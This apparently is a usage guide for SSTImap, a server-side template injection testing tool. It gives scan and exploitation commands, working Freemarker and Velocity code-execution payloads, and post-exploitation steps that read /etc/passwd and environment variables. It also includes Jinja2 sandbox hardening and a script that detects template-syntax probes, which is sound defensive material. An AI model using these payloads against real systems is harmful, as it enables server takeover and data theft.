SSTImap
Overview
SSTImap is an automated security testing tool for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. It identifies the template engine in use and attempts code execution to demonstrate the impact of an SSTI vulnerability.
Key Features
- Automatic template engine detection
- SSTI vulnerability scanning
- Blind and non-blind exploitation
- Multi-payload testing
- Code execution capabilities
- Request/response analysis
- Vulnerability reporting
- Cross-platform support
Important Notice
WARNING: SSTImap should ONLY be used:
- In authorized penetration testing
- With explicit written permission
- On systems you own or control
- In security research environments
- For vulnerability assessment
Unauthorized testing is illegal and unethical.
Use Cases (Authorized)
- Identify SSTI vulnerabilities in web applications
- Test template engine security configurations
- Verify vulnerability remediation
- Security research and education
- Penetration testing with authorization
- Code execution impact demonstration
Installation
From GitHub
Seção intitulada “From GitHub”git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
chmod +x sstimap.py
Python Requirements
# Install dependencies
pip install requests
# Or with requirements file
pip install -r requirements.txt
Verify Installation
python sstimap.py -h
Docker Installation
docker pull sstimap:latest
docker run -it sstimap:latest -h
Basic Concepts
What is SSTI?
Server-Side Template Injection occurs when:
- User input is embedded directly into the template source rather than passed to the template as data
- The template is evaluated server-side
- Input sanitization is missing or insufficient
- An attacker can therefore inject template directives that the engine executes
Common Vulnerable Templates
| Engine | Language | Usage |
|---|---|---|
| Jinja2 | Python | Flask, Django |
| Twig | PHP | Symfony |
| Freemarker | Java | Spring Boot |
| Velocity | Java | Various frameworks |
| Thymeleaf | Java | Spring |
| ERB | Ruby | Rails |
| Jade/Pug | Node.js | Express |
| EJS | Node.js | Express |
Attack Payload Examples
Jinja2: {{7*7}}
Twig: {{7*7}}
Freemarker: <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Velocity: #set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))$rt.getRuntime().exec('command')
Installation and Setup
Full Installation
# Clone repository
git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
# Install dependencies
pip install -r requirements.txt
# Make executable
chmod +x sstimap.py
# Run help
./sstimap.py -h
Alternative: Python Package
pip install sstimap
sstimap.py -h
Basic Usage
Simple Vulnerability Scan
# Scan single URL
python sstimap.py -u "http://vulnerable-site.com/page?name=test"
# Output:
# [*] Testing server-side template injection
# [+] Jinja2 detected in: name parameter
# [+] Vulnerability confirmed
Scan with Custom Payload Parameter
# Test specific parameter
python sstimap.py -u "http://example.com/test?input=PAYLOAD" \
--test-parameter "input"
Output to File
# Save results to file
python sstimap.py -u "http://example.com/?name=test" \
-o results.txt
Verbose Output
# Enable verbose mode for detailed information
python sstimap.py -u "http://example.com/?name=test" \
-v
Advanced Scanning
Template Engine Detection
# Detect template engine without exploitation
python sstimap.py -u "http://vulnerable-app.com/?search=test" \
--detect-only
# Output shows:
# [+] Template engine: Jinja2
# [+] Injection point: search parameter
Test All Parameters
# Automatically test all GET/POST parameters
python sstimap.py -u "http://example.com/?id=1&name=test&type=prod" \
--test-all-params
Blind SSTI Detection
# Test for blind SSTI (time-based)
python sstimap.py -u "http://example.com/?input=test" \
--detect-blind
# Introduces delays to detect processing
Custom Timeout
# Set custom timeout for responses
python sstimap.py -u "http://example.com/?id=test" \
--timeout 10
Exploitation Techniques
Basic Code Execution
# Test basic math to confirm SSTI
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD" \
--test-expression "7*7"
# Result should show: 49
Command Execution
# Execute OS command
python sstimap.py -u "http://example.com/?input=PAYLOAD" \
--execute-command "id"
# Attempts: whoami, id, cat /etc/passwd, etc.
File Reading
# Read server files
python sstimap.py -u "http://example.com/?file=PAYLOAD" \
--read-file "/etc/passwd"
# Or guess common file paths
python sstimap.py -u "http://example.com/?page=PAYLOAD" \
--read-files
Database Interaction
# Attempt database access via template injection
python sstimap.py -u "http://vulnerable-app.com/?search=PAYLOAD" \
--database
Request Configuration
Custom Headers
# Add authentication headers
python sstimap.py -u "http://example.com/?id=test" \
-H "Authorization: Bearer TOKEN" \
-H "User-Agent: Custom-Agent"
POST Data
# Test POST parameters
python sstimap.py -u "http://example.com/login" \
--data "username=admin&password=test" \
--test-parameter "password"
Cookies
# Include session cookies
python sstimap.py -u "http://example.com/?name=test" \
--cookie "PHPSESSID=abcd1234; admin=false"
Proxy Configuration
# Route through proxy
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080"
# For Burp Suite
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080" \
--ignore-proxy-warnings
SSL Verification
# Ignore SSL warnings (test environments)
python sstimap.py -u "https://example.com/?input=test" \
--no-ssl-verify
Template Engine Specific Payloads
Jinja2 (Python)
# Test Jinja2
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payloads tested:
# {{7*7}} -> 49
# {{config.items()}}
# {{request.environ}}
Twig (PHP)
# Twig injection test
python sstimap.py -u "http://vulnerable.com/?search=PAYLOAD"
# Payloads:
# {{7*7}} -> 49
# {{_self}}
# {{this.env}}
Freemarker (Java)
# Freemarker payload
python sstimap.py -u "http://vulnerable.com/?input=PAYLOAD"
# Freemarker RCE payload
# <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
Velocity (Java)
# Velocity injection
python sstimap.py -u "http://vulnerable.com/?id=PAYLOAD"
# Math expression: #set($x=7*7)$x
Thymeleaf (Java)
# Thymeleaf template injection
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payload: [[${7*7}]]
Automation and Batch Testing
Scan Multiple URLs
# Test multiple endpoints, writing one result file per URL
# (a counter is used instead of a timestamp so two runs finishing in the
# same second cannot overwrite each other)
i=0
while read -r url; do
  i=$((i+1))
  python sstimap.py -u "$url" -o "results_$i.txt"
done < urls.txt
Bulk Parameter Testing
#!/bin/bash
# Test all parameters for every URL in the list; each URL gets its own
# output file so later runs do not overwrite earlier results
i=0
while read -r url; do
  i=$((i+1))
  echo "Testing: $url"
  python sstimap.py -u "$url" \
    --test-all-params \
    -o "results_$i.txt"
done < urls.txt
Automated Reporting
#!/bin/bash
# Generate a report of findings
TARGET="http://vulnerable-app.com"
REPORT="ssti_report_$(date +%Y%m%d).txt"
{
  echo "SSTI Vulnerability Assessment Report"
  echo "Date: $(date)"
  echo "Target: $TARGET"
  echo "================================"
} > "$REPORT"
# Test all discovered endpoints; stderr is captured too so errors end up in the report
python sstimap.py -u "$TARGET" \
  --test-all-params \
  -v >> "$REPORT" 2>&1
echo "Report saved to: $REPORT"
Output Analysis
Understanding Output
[*] Testing server-side template injection
[+] Detected: Jinja2 in parameter 'name'
[*] Attempting exploitation...
[+] Payload: {{7*7}}
[+] Response: 49
[+] VULNERABILITY CONFIRMED
[*] Attempting code execution...
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Parse Results Script
#!/bin/bash
# Extract vulnerable endpoints. The '+' must be escaped, otherwise the
# pattern \[+\] means "one or more '[' followed by ']'" and never matches "[+]".
python sstimap.py -u "http://target.com/?id=test" \
  --test-all-params -v 2>&1 | \
  grep -E '\[\+\]|VULNERABLE' | \
  tee vulnerabilities.log
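The grep pipeline above only filters lines; for a report or a ticketing system a structured record is more useful. The following is an added example (not part of SSTImap) that parses the output format shown under "Understanding Output" into a finding dict with a triage severity, and cross-checks the arithmetic probe against the response as the "False Positives" section advises. The first sample run is copied from this page; the second is a constructed `--detect-only` run. Real SSTImap output may differ in layout, in which case only the regular expressions need adjusting.

```python
"""Added example, not part of SSTImap: turn the tool's text output (the format
shown under 'Understanding Output' above) into a structured finding for a
report or ticket. SAMPLE_OUTPUT is copied from the page; SAMPLE_DETECT_ONLY is
a constructed --detect-only run. Real SSTImap line layout may differ, in which
case only the regular expressions below need adjusting."""
import json
import re

SAMPLE_OUTPUT = """\
[*] Testing server-side template injection
[+] Detected: Jinja2 in parameter 'name'
[*] Attempting exploitation...
[+] Payload: {{7*7}}
[+] Response: 49
[+] VULNERABILITY CONFIRMED
[*] Attempting code execution...
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""

SAMPLE_DETECT_ONLY = """\
[*] Testing server-side template injection
[+] Template engine: Jinja2
[+] Injection point: search parameter
"""

# One regex per status line we care about; anything else is ignored.
DETECTED = re.compile(r"^\[\+\] Detected: (?P<engine>\S+) in parameter '(?P<param>[^']+)'")
ENGINE = re.compile(r"^\[\+\] Template engine: (?P<engine>\S+)")
INJECTION = re.compile(r"^\[\+\] Injection point: (?P<param>\S+) parameter")
PAYLOAD = re.compile(r"^\[\+\] Payload: (?P<payload>.+)$")
RESPONSE = re.compile(r"^\[\+\] Response: (?P<response>.+)$")
CONFIRMED = re.compile(r"^\[\+\] VULNERABILITY CONFIRMED")
CMD_OUTPUT = re.compile(r"^\[\+\] Command output:")


def arithmetic_consistent(payload, response):
    """Cross-check for an arithmetic probe: the response should be exactly the
    product (7*7 -> 49). Returns None when the payload is not arithmetic."""
    if payload is None or response is None:
        return None
    m = re.search(r"(\d+)\s*\*\s*(\d+)", payload)
    if not m:
        return None
    return response.strip() == str(int(m.group(1)) * int(m.group(2)))


def severity(finding):
    """Rough triage: proven code execution > confirmed injection > detection only."""
    if finding["command_output"]:
        return "critical"
    if finding["confirmed"]:
        return "high"
    if finding["engine"]:
        return "medium"
    return "info"


def parse_sstimap_output(text):
    """Parse one run's output into a dict. Command output is collected until
    the next '[' status line, so multi-line command results are kept whole."""
    finding = {"engine": None, "parameter": None, "payload": None,
               "response": None, "confirmed": False, "command_output": []}
    in_cmd = False
    for line in text.splitlines():
        if in_cmd and not line.startswith("["):
            finding["command_output"].append(line)
            continue
        in_cmd = False
        m = DETECTED.match(line) or ENGINE.match(line)
        if m:
            finding["engine"] = m.group("engine")
            if "param" in m.groupdict():
                finding["parameter"] = m.group("param")
            continue
        m = INJECTION.match(line)
        if m:
            finding["parameter"] = m.group("param")
            continue
        m = PAYLOAD.match(line)
        if m:
            finding["payload"] = m.group("payload").strip()
            continue
        m = RESPONSE.match(line)
        if m:
            finding["response"] = m.group("response").strip()
            continue
        if CONFIRMED.match(line):
            finding["confirmed"] = True
        elif CMD_OUTPUT.match(line):
            in_cmd = True
    finding["arith_consistent"] = arithmetic_consistent(finding["payload"], finding["response"])
    finding["severity"] = severity(finding)
    return finding


def to_json(text):
    """JSON rendering of a parsed run, ready for a report or a ticket API."""
    return json.dumps(parse_sstimap_output(text), indent=2)


if __name__ == "__main__":
    print(to_json(SAMPLE_OUTPUT))
    print(to_json(SAMPLE_DETECT_ONLY))
```

Pipe a captured run into the parser (`python parse.py < sstimap_run.txt` after swapping `SAMPLE_OUTPUT` for `sys.stdin.read()`) and the `arith_consistent` field gives a quick sanity check: a "confirmed" finding whose arithmetic probe and response do not agree deserves the manual verification described under "False Positives".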
Exploitation Workflow
Step 1: Reconnaissance
# Map application parameters
python sstimap.py -u "http://target.com/?search=test&category=1" \
--detect-only
Step 2: Template Detection
# Identify template engine
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--detect-template-engine
Step 3: Vulnerability Confirmation
# Confirm SSTI vulnerability
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--test-expression "7*7"
Step 4: Code Execution
# Execute commands
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--execute-command "id"
Step 5: Post-Exploitation
# Read sensitive files
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-file "/etc/passwd"
# Access environment variables
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-env
Integration with Other Tools
Burp Suite Integration
# Use SSTImap through Burp proxy
python sstimap.py -u "http://example.com/?param=test" \
--proxy "http://127.0.0.1:8080"
# Intercept and modify requests in Burp
# Then test with SSTImap
OWASP ZAP Integration
# Export ZAP findings and test with SSTImap
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8090"
Metasploit Integration
# Use findings from SSTImap in Metasploit
# 1. Run SSTImap to identify SSTI
# 2. Use template-specific exploits in Metasploit
# 3. Gain shell access via template injection
Prevention and Mitigation
Secure Coding Practices
1. Input Validation
- Whitelist allowed characters
- Reject suspicious patterns
- Length restrictions
2. Template Sandboxing
- Use restricted templates
- Disable dangerous functions
- Limit object access
3. Context Separation
- Don't mix code with templates
- Use template escaping
- Separate logic from presentation
4. Security Configuration
- Disable debug mode in production
- Restrict file access
- Limit available functions
Jinja2 Hardening Example
from jinja2 import select_autoescape
from jinja2.sandbox import SandboxedEnvironment

# Create a restricted environment. Jinja2's sandbox is a separate
# Environment subclass (there is no sandbox=True option): it blocks
# access to unsafe attributes such as __class__ and __globals__, and
# autoescape protects the HTML/XML output.
env = SandboxedEnvironment(
    autoescape=select_autoescape(['html', 'xml']),
)

# Never compile user input as template source: keep the template fixed
# and pass the user-supplied value in as a variable, so {{7*7}} in the
# input is rendered as text, not evaluated.
template = env.from_string("Hello, {{ name }}!")
result = template.render(name=user_input)
Detection Patterns
Suspicious patterns to monitor:
- Responses in which an arithmetic probe such as {{7*7}} comes back rendered as 49
- Template statement syntax such as {%.*%} in request parameters
- Attempts to reach engine or application objects from within a parameter
- File read attempts
- OS command patterns in parameters
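The following is an added example (not SSTImap code) that puts the "Secure Coding Practices" list and the detection patterns above into working code. One set of template-syntax patterns serves both halves: `validate_field` applies a length limit, a positive allowlist and a pattern reject at the input edge, and `scan_request` runs over request/response records (constructed here; in practice built from an access log or a WAF export) and tells a probe that was merely echoed back from one whose product appeared in the response, which is the true positive the `{{7*7}}` / `49` pattern describes. The allowlists are an assumed per-field policy, not a recommendation from the page.

```python
"""Added example (not SSTImap code). Two defender-side pieces that share one
set of template-syntax patterns:
  validate_field  - allowlist + length + pattern rejection at the input edge
  scan_request    - flag SSTI probes in request/response records and tell a
                    merely echoed probe from one the engine evaluated
All request records below are constructed for the demo."""
import re
from urllib.parse import unquote_plus

# Template syntax a form field should never carry; one entry per engine
# family from the table above (Jinja2/Twig, Freemarker/Thymeleaf, Velocity, ERB).
TEMPLATE_SYNTAX = {
    "jinja2/twig expression": re.compile(r"\{\{.*?\}\}", re.S),
    "jinja2/twig statement": re.compile(r"\{%.*?%\}", re.S),
    "freemarker/thymeleaf interpolation": re.compile(r"\$\{.*?\}", re.S),
    "freemarker directive": re.compile(r"<#\w+"),
    "velocity directive": re.compile(r"#(?:set|foreach|if)\s*\(.*?\)", re.S),
    "erb tag": re.compile(r"<%.*?%>", re.S),
}

# Positive allowlists (assumed per-field policy): a name gets letters, digits,
# space and a little punctuation; a comment box keeps everything printable and
# therefore relies on the pattern check as a second layer.
NAME_ALLOWLIST = re.compile(r"[A-Za-z0-9 .'-]+")
FREE_TEXT_ALLOWLIST = re.compile(r"[^\x00-\x1f\x7f]*")
MAX_FIELD_LEN = 64


def validate_field(value, allowlist=NAME_ALLOWLIST, max_len=MAX_FIELD_LEN):
    """Return (ok, reason). Checks run length -> allowlist -> template syntax."""
    if len(value) > max_len:
        return False, "too long"
    if not allowlist.fullmatch(value):
        return False, "character outside allowlist"
    for name, pattern in TEMPLATE_SYNTAX.items():
        if pattern.search(value):
            return False, "template syntax: " + name
    return True, "ok"


ARITH_PROBE = re.compile(r"(\d{1,4})\s*\*\s*(\d{1,4})")
OBJECT_ACCESS = re.compile(r"config|request|environ|_self|\.class|Runtime")


def scan_request(rec):
    """One request/response record -> list of findings.
    verdict: 'evaluated'     the product of an arithmetic probe came back,
                             so the engine executed the input (true positive)
             'object-access' the payload reaches for engine/runtime objects
             'probe'         template syntax seen, but only echoed back"""
    decoded = unquote_plus(rec.get("query", "")) + " " + unquote_plus(rec.get("body", ""))
    response = rec.get("response", "")
    findings = []
    for name, pattern in TEMPLATE_SYNTAX.items():
        for match in pattern.finditer(decoded):
            payload = match.group(0)
            verdict = "probe"
            arith = ARITH_PROBE.search(payload)
            if arith:
                product = str(int(arith.group(1)) * int(arith.group(2)))
                # standalone number in the response, not part of a longer digit run
                if re.search(r"(?<!\d)" + product + r"(?!\d)", response):
                    verdict = "evaluated"
            if verdict == "probe" and OBJECT_ACCESS.search(payload):
                verdict = "object-access"
            findings.append({"syntax": name, "payload": payload, "verdict": verdict})
    return findings


def summarize(records):
    """Count findings per verdict across a batch of records."""
    counts = {"probe": 0, "object-access": 0, "evaluated": 0}
    for rec in records:
        for f in scan_request(rec):
            counts[f["verdict"]] += 1
    return counts


# Constructed records: a benign request, an echoed probe, an evaluated probe,
# an object-access attempt in a POST body, and an evaluated Velocity probe.
SAMPLE_REQUESTS = [
    {"query": "name=Alice", "response": "Hello Alice"},
    {"query": "name=%7B%7B7*7%7D%7D", "response": "Hello {{7*7}}"},
    {"query": "name=%7B%7B7*7%7D%7D", "response": "Hello 49"},
    {"query": "search=test", "body": "q=%7B%7Bconfig.items()%7D%7D", "response": "No results"},
    {"query": "id=%23set(%24x%3D7*7)%24x", "response": "49"},
]

if __name__ == "__main__":
    print(validate_field("Alice O'Neil"), validate_field("{{7*7}}"))
    print(validate_field("{{7*7}}", FREE_TEXT_ALLOWLIST))
    for rec in SAMPLE_REQUESTS:
        print(scan_request(rec))
    print(summarize(SAMPLE_REQUESTS))
```

The order of checks in `validate_field` matters: the length limit runs first because regular expressions over unbounded input are their own denial-of-service risk, and the positive allowlist does most of the work, so the template-syntax reject list is only a backstop for fields that must accept braces and punctuation. On the detection side, an `evaluated` verdict is the one worth paging on; `probe` alone is common scanner noise.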
Troubleshooting
Tool Not Finding Vulnerabilities
Issue: SSTI exists but SSTImap doesn’t detect it.
Solution:
# Try manual testing
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
-v
# Test with custom payload
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
--payload "{{7*7}}"
# Different parameter
python sstimap.py -u "http://example.com/?name=PAYLOAD" \
--test-parameter "name"
Connection Issues
Issue: Unable to connect to target.
Solution:
# Test connectivity
curl http://target.com/?id=test
# Try with verbose
python sstimap.py -u "http://target.com/?id=test" \
-v
# Use proxy if needed
python sstimap.py -u "http://target.com/?id=test" \
--proxy "http://127.0.0.1:8080"
False Positives
Issue: Tool reports vulnerabilities that don’t exist.
Solution:
# Verify manually
# 1. Submit test payload: {{7*7}}
# 2. Check if response shows: 49
# 3. Confirm with different payloads
# Test with blind detection
python sstimap.py -u "http://target.com/?id=test" \
--detect-blind
Security Considerations
Authorized Testing Only
Before testing:
✓ Obtain written authorization
✓ Define scope clearly
✓ Document test plan
✓ Get legal review
✓ Maintain confidentiality
Data Protection
# Encrypt sensitive findings
gpg -e -r recipient@company.com report.txt
# Secure deletion
shred -vfz report.txt
# Audit trail
echo "$(date): SSTI testing completed" >> audit.log
References
- GitHub: vladimirmitin/sstimap
- OWASP: Server-Side Template Injection
- PortSwigger: SSTI Tutorial
- CVE Database: Search SSTI vulnerabilities
Quick Reference
# Basic scan
python sstimap.py -u "http://vulnerable.com/?id=test"
# Detect template engine
python sstimap.py -u "http://vulnerable.com/?id=test" --detect-only
# Execute command
python sstimap.py -u "http://vulnerable.com/?id=test" --execute-command "id"
# Read file
python sstimap.py -u "http://vulnerable.com/?id=test" --read-file "/etc/passwd"
# Test all parameters
python sstimap.py -u "http://vulnerable.com/?a=1&b=2&c=3" --test-all-params
# Verbose output
python sstimap.py -u "http://vulnerable.com/?id=test" -v
# Save results
python sstimap.py -u "http://vulnerable.com/?id=test" -o results.txt
# With proxy
python sstimap.py -u "http://vulnerable.com/?id=test" --proxy "http://127.0.0.1:8080"
# Custom headers
python sstimap.py -u "http://vulnerable.com/?id=test" \
-H "Authorization: Bearer TOKEN"